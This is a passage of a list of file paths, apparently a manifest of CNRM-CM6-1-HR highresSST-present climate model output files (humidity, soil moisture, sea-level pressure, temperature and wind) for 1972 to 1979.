'v20170518_1970/hus4_6hrPlev_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197604010000-197604302359.nc',
'v20170518_1970/hus4_6hrPlev_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197411010000-197411302359.nc',
'v20170518_1970/hus4_6hrPlev_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197605010000-197605312359.nc',
'v20170518_1970/hus4_6hrPlev_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197412010000-197412312359.nc',
'v20170518_1970/hus4_6hrPlev_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197606010000-197606302359.nc',
'v20170518_1970/hus4_6hrPlev_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197501010000-197501312359.nc',
'v20170518_1970/hus4_6hrPlev_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197607010000-197607312359.nc',
'v20170518_1970/hus4_6hrPlev_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197502010000-197502282359.nc',
'v20170518_1970/hus4_6hrPlev_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197608010000-197608312359.nc',
'v20170518_1970/hus4_6hrPlev_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197503010000-197503312359.nc',
'v20170518_1970/hus4_6hrPlev_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197609010000-197609302359.nc',
'v20170518_1970/hus4_6hrPlev_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197504010000-197504302359.nc',
'v20170518_1970/hus4_6hrPlev_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197610010000-197610312359.nc',
'v20170518_1970/hus4_6hrPlev_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197505010000-197505312359.nc',
'v20170518_1970/hus4_6hrPlev_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197611010000-197611302359.nc',
'v20170518_1970/hus4_6hrPlev_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197506010000-197506302359.nc',
'v20170518_1970/hus4_6hrPlev_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197612010000-197612312359.nc',
'v20170518_1970/hus4_6hrPlev_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197507010000-197507312359.nc',
'v20170518_1970/hus4_6hrPlev_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197701010000-197701312359.nc',
'v20170518_1970/hus4_6hrPlev_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197508010000-197508312359.nc',
'v20170518_1970/hus4_6hrPlev_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197702010000-197702282359.nc',
'v20170518_1970/hus4_6hrPlev_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197509010000-197509302359.nc',
'v20170518_1970/hus4_6hrPlev_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197703010000-197703312359.nc',
'v20170518_1970/hus4_6hrPlev_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197510010000-197510312359.nc',
'v20170518_1970/hus4_6hrPlev_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197704010000-197704302359.nc',
'v20170518_1970/hus4_6hrPlev_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197511010000-197511302359.nc',
'v20170518_1970/hus4_6hrPlev_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197705010000-197705312359.nc',
'v20170518_1970/hus4_6hrPlev_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197512010000-197512312359.nc',
'v20170518_1970/hus4_6hrPlev_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197706010000-197706302359.nc',
'v20170518_1970/hus4_6hrPlev_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197707010000-197707312359.nc',
'v20170518_1970/hus4_6hrPlev_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197708010000-197708312359.nc',
'v20170518_1970/hus4_6hrPlev_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197801010000-197801312359.nc',
'v20170518_1970/hus4_6hrPlev_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197709010000-197709302359.nc',
'v20170518_1970/hus4_6hrPlev_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197710010000-197710312359.nc',
'v20170518_1970/hus4_6hrPlev_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197802010000-197802282359.nc',
'v20170518_1970/hus4_6hrPlev_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197711010000-197711302359.nc',
'v20170518_1970/hus4_6hrPlev_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197803010000-197803312359.nc',
'v20170518_1970/hus4_6hrPlev_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197712010000-197712312359.nc',
'v20170518_1970/hus4_6hrPlev_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197804010000-197804302359.nc',
'v20170518_1970/hus4_6hrPlev_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197805010000-197805312359.nc',
'v20170518_1970/hus4_6hrPlev_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197806010000-197806302359.nc',
'v20170518_1970/hus4_6hrPlev_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197807010000-197807312359.nc',
'v20170518_1970/hus4_6hrPlev_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197808010000-197808312359.nc',
'v20170518_1970/hus4_6hrPlev_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197809010000-197809302359.nc',
'v20170518_1970/hus4_6hrPlev_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197810010000-197810312359.nc',
'v20170518_1970/hus4_6hrPlev_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197811010000-197811302359.nc',
'v20170518_1970/hus4_6hrPlev_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197812010000-197812312359.nc',
'v20170518_1970/hus4_6hrPlev_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197901010000-197901312359.nc',
'v20170518_1970/hus4_6hrPlev_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197902010000-197902282359.nc',
'v20170518_1970/hus4_6hrPlev_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197903010000-197903312359.nc',
'v20170518_1970/hus4_6hrPlev_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197904010000-197904302359.nc',
'v20170518_1970/hus4_6hrPlev_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197905010000-197905312359.nc',
'v20170518_1970/hus4_6hrPlev_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197906010000-197906302359.nc',
'v20170518_1970/hus4_6hrPlev_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197907010000-197907312359.nc',
'v20170518_1970/hus4_6hrPlev_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197908010000-197908312359.nc',
'v20170518_1970/hus4_6hrPlev_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197909010000-197909302359.nc',
'v20170518_1970/hus4_6hrPlev_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197910010000-197910312359.nc',
'v20170518_1970/hus4_6hrPlev_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197911010000-197911302359.nc',
'v20170518_1970/hus4_6hrPlev_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197912010000-197912312359.nc',
'v20170518_1970/mrso_day_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19720101-19721231.nc',
'v20170518_1970/mrso_day_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19730101-19731231.nc',
'v20170518_1970/mrso_day_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19740101-19741231.nc',
'v20170518_1970/mrso_day_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19750101-19751231.nc',
'v20170518_1970/psl_E3hr_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197201010000-197201312359.nc',
'v20170518_1970/mrso_day_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19760101-19761231.nc',
'v20170518_1970/psl_E3hr_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197204010000-197204302359.nc',
'v20170518_1970/mrso_day_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19770101-19771231.nc',
'v20170518_1970/psl_E3hr_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197209010000-197209302359.nc',
'v20170518_1970/psl_E3hr_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197211010000-197211302359.nc',
'v20170518_1970/psl_E3hr_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197212010000-197212312359.nc',
'v20170518_1970/psl_E3hr_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197301010000-197301312359.nc',
'v20170518_1970/psl_E3hr_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197302010000-197302282359.nc',
'v20170518_1970/psl_E3hr_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197303010000-197303312359.nc',
'v20170518_1970/psl_E3hr_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197304010000-197304302359.nc',
'v20170518_1970/psl_E3hr_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197305010000-197305312359.nc',
'v20170518_1970/psl_E3hr_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197306010000-197306302359.nc',
'v20170518_1970/psl_E3hr_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197307010000-197307312359.nc',
'v20170518_1970/psl_E3hr_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197308010000-197308312359.nc',
'v20170518_1970/psl_E3hr_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197309010000-197309302359.nc',
'v20170518_1970/psl_E3hr_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197310010000-197310312359.nc',
'v20170518_1970/psl_E3hr_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197311010000-197311302359.nc',
'v20170518_1970/psl_E3hr_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197312010000-197312312359.nc',
'v20170518_1970/mrso_day_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19780101-19781231.nc',
'v20170518_1970/mrso_day_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19790101-19791231.nc',
'v20170518_1970/ta_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197202010000-197202292359.nc',
'v20170518_1970/ta_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197204010000-197204302359.nc',
'v20170518_1970/ta_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197205010000-197205312359.nc',
'v20170518_1970/ta_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197206010000-197206302359.nc',
'v20170518_1970/ta_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197207010000-197207312359.nc',
'v20170518_1970/ta_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197210010000-197210312359.nc',
'v20170518_1970/ta_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197211010000-197211302359.nc',
'v20170518_1970/ta_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197212010000-197212312359.nc',
'v20170518_1970/ta_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197301010000-197301312359.nc',
'v20170518_1970/ta_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197302010000-197302282359.nc',
'v20170518_1970/ta_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197303010000-197303312359.nc',
'v20170518_1970/ta_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197304010000-197304302359.nc',
'v20170518_1970/ta_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197305010000-197305312359.nc',
'v20170518_1970/ta_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197306010000-197306302359.nc',
'v20170518_1970/ta_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197307010000-197307312359.nc',
'v20170518_1970/ta_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197308010000-197308312359.nc',
'v20170518_1970/ta_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197309010000-197309302359.nc',
'v20170518_1970/ta_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197310010000-197310312359.nc',
'v20170518_1970/ta_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197311010000-197311302359.nc',
'v20170518_1970/ta_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197312010000-197312312359.nc',
'v20170518_1970/psl_E3hr_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197401010000-197401312359.nc',
'v20170518_1970/psl_E3hr_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197402010000-197402282359.nc',
'v20170518_1970/psl_E3hr_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197403010000-197403312359.nc',
'v20170518_1970/psl_E3hr_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197404010000-197404302359.nc',
'v20170518_1970/psl_E3hr_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197405010000-197405312359.nc',
'v20170518_1970/psl_E3hr_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197406010000-197406302359.nc',
'v20170518_1970/psl_E3hr_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197407010000-197407312359.nc',
'v20170518_1970/psl_E3hr_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197408010000-197408312359.nc',
'v20170518_1970/psl_E3hr_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197409010000-197409302359.nc',
'v20170518_1970/psl_E3hr_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197410010000-197410312359.nc',
'v20170518_1970/psl_E3hr_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197411010000-197411302359.nc',
'v20170518_1970/psl_E3hr_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197412010000-197412312359.nc',
'v20170518_1970/psl_E3hr_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197501010000-197501312359.nc',
'v20170518_1970/psl_E3hr_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197502010000-197502282359.nc',
'v20170518_1970/psl_E3hr_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197503010000-197503312359.nc',
'v20170518_1970/psl_E3hr_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197504010000-197504302359.nc',
'v20170518_1970/psl_E3hr_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197505010000-197505312359.nc',
'v20170518_1970/psl_E3hr_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197506010000-197506302359.nc',
'v20170518_1970/psl_E3hr_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197507010000-197507312359.nc',
'v20170518_1970/psl_E3hr_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197508010000-197508312359.nc',
'v20170518_1970/psl_E3hr_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197509010000-197509302359.nc',
'v20170518_1970/psl_E3hr_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197510010000-197510312359.nc',
'v20170518_1970/psl_E3hr_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197511010000-197511302359.nc',
'v20170518_1970/psl_E3hr_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197512010000-197512312359.nc',
'v20170518_1970/psl_E3hr_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197601010000-197601312359.nc',
'v20170518_1970/psl_E3hr_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197602010000-197602292359.nc',
'v20170518_1970/psl_E3hr_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197603010000-197603312359.nc',
'v20170518_1970/psl_E3hr_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197604010000-197604302359.nc',
'v20170518_1970/psl_E3hr_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197605010000-197605312359.nc',
'v20170518_1970/psl_E3hr_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197606010000-197606302359.nc',
'v20170518_1970/psl_E3hr_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197607010000-197607312359.nc',
'v20170518_1970/psl_E3hr_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197608010000-197608312359.nc',
'v20170518_1970/psl_E3hr_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197609010000-197609302359.nc',
'v20170518_1970/psl_E3hr_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197610010000-197610312359.nc',
'v20170518_1970/psl_E3hr_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197611010000-197611302359.nc',
'v20170518_1970/psl_E3hr_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197612010000-197612312359.nc',
'v20170518_1970/psl_E3hr_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197701010000-197701312359.nc',
'v20170518_1970/psl_E3hr_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197702010000-197702282359.nc',
'v20170518_1970/psl_E3hr_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197703010000-197703312359.nc',
'v20170518_1970/psl_E3hr_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197704010000-197704302359.nc',
'v20170518_1970/psl_E3hr_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197705010000-197705312359.nc',
'v20170518_1970/psl_E3hr_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197706010000-197706302359.nc',
'v20170518_1970/psl_E3hr_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197707010000-197707312359.nc',
'v20170518_1970/psl_E3hr_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197708010000-197708312359.nc',
'v20170518_1970/psl_E3hr_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197709010000-197709302359.nc',
'v20170518_1970/psl_E3hr_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197710010000-197710312359.nc',
'v20170518_1970/psl_E3hr_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197711010000-197711302359.nc',
'v20170518_1970/psl_E3hr_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197712010000-197712312359.nc',
'v20170518_1970/psl_E3hr_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197801010000-197801312359.nc',
'v20170518_1970/psl_E3hr_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197802010000-197802282359.nc',
'v20170518_1970/psl_E3hr_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197803010000-197803312359.nc',
'v20170518_1970/psl_E3hr_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197804010000-197804302359.nc',
'v20170518_1970/psl_E3hr_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197805010000-197805312359.nc',
'v20170518_1970/psl_E3hr_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197806010000-197806302359.nc',
'v20170518_1970/psl_E3hr_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197807010000-197807312359.nc',
'v20170518_1970/psl_E3hr_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197808010000-197808312359.nc',
'v20170518_1970/psl_E3hr_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197809010000-197809302359.nc',
'v20170518_1970/psl_E3hr_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197810010000-197810312359.nc',
'v20170518_1970/psl_E3hr_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197811010000-197811302359.nc',
'v20170518_1970/psl_E3hr_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197812010000-197812312359.nc',
'v20170518_1970/psl_E3hr_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197901010000-197901312359.nc',
'v20170518_1970/psl_E3hr_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197902010000-197902282359.nc',
'v20170518_1970/psl_E3hr_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197903010000-197903312359.nc',
'v20170518_1970/psl_E3hr_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197904010000-197904302359.nc',
'v20170518_1970/psl_E3hr_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197905010000-197905312359.nc',
'v20170518_1970/psl_E3hr_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197906010000-197906302359.nc',
'v20170518_1970/psl_E3hr_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197907010000-197907312359.nc',
'v20170518_1970/psl_E3hr_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197908010000-197908312359.nc',
'v20170518_1970/psl_E3hr_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197909010000-197909302359.nc',
'v20170518_1970/psl_E3hr_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197910010000-197910312359.nc',
'v20170518_1970/psl_E3hr_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197911010000-197911302359.nc',
'v20170518_1970/psl_E3hr_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197912010000-197912312359.nc',
'v20170518_1970/ts_Eday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19730101-19731231.nc',
'v20170518_1970/ua_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197202010000-197202292359.nc',
'v20170518_1970/ua_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197203010000-197203312359.nc',
'v20170518_1970/ua_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197205010000-197205312359.nc',
'v20170518_1970/ua_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197206010000-197206302359.nc',
'v20170518_1970/ua_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197207010000-197207312359.nc',
'v20170518_1970/ua_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197208010000-197208312359.nc',
'v20170518_1970/ua_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197209010000-197209302359.nc',
'v20170518_1970/ua_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197210010000-197210312359.nc',
'v20170518_1970/ua_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197301010000-197301312359.nc',
'v20170518_1970/ua_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197302010000-197302282359.nc',
'v20170518_1970/ua_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197303010000-197303312359.nc',
'v20170518_1970/ua_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197304010000-197304302359.nc',
'v20170518_1970/ua_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197305010000-197305312359.nc',
'v20170518_1970/ua_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197306010000-197306302359.nc',
'v20170518_1970/ua_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197307010000-197307312359.nc',
'v20170518_1970/ua_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197308010000-197308312359.nc',
'v20170518_1970/ua_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197309010000-197309302359.nc',
'v20170518_1970/ua_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197310010000-197310312359.nc',
'v20170518_1970/ua_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197311010000-197311302359.nc',
'v20170518_1970/ua_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197312010000-197312312359.nc',
'v20170518_1970/ua_AERmon_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197201-197212.nc',
'v20170518_1970/ua_AERmon_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197301-197312.nc',
'v20170518_1970/ta_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197401010000-197401312359.nc',
'v20170518_1970/ta_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197402010000-197402282359.nc',
'v20170518_1970/ta_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197403010000-197403312359.nc',
'v20170518_1970/ta_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197404010000-197404302359.nc',
'v20170518_1970/ta_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197405010000-197405312359.nc',
'v20170518_1970/ta_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197406010000-197406302359.nc',
'v20170518_1970/ta_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197407010000-197407312359.nc',
'v20170518_1970/ta_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197408010000-197408312359.nc',
'v20170518_1970/ta_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197409010000-197409302359.nc',
'v20170518_1970/ta_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197410010000-197410312359.nc',
'v20170518_1970/ta_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197411010000-197411302359.nc',
'v20170518_1970/ta_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197412010000-197412312359.nc',
'v20170518_1970/ta_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197501010000-197501312359.nc',
'v20170518_1970/ta_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197502010000-197502282359.nc',
'v20170518_1970/ta_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197503010000-197503312359.nc',
'v20170518_1970/ta_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197504010000-197504302359.nc',
'v20170518_1970/ta_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197505010000-197505312359.nc',
'v20170518_1970/ta_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197506010000-197506302359.nc',
'v20170518_1970/ta_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197507010000-197507312359.nc',
'v20170518_1970/ta_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197508010000-197508312359.nc',
'v20170518_1970/ta_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197509010000-197509302359.nc',
'v20170518_1970/ta_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197510010000-197510312359.nc',
'v20170518_1970/ta_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197511010000-197511302359.nc',
'v20170518_1970/ta_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197512010000-197512312359.nc',
'v20170518_1970/ta_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197601010000-197601312359.nc',
'v20170518_1970/ta_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197602010000-197602292359.nc',
'v20170518_1970/ta_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197603010000-197603312359.nc',
'v20170518_1970/ta_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197604010000-197604302359.nc',
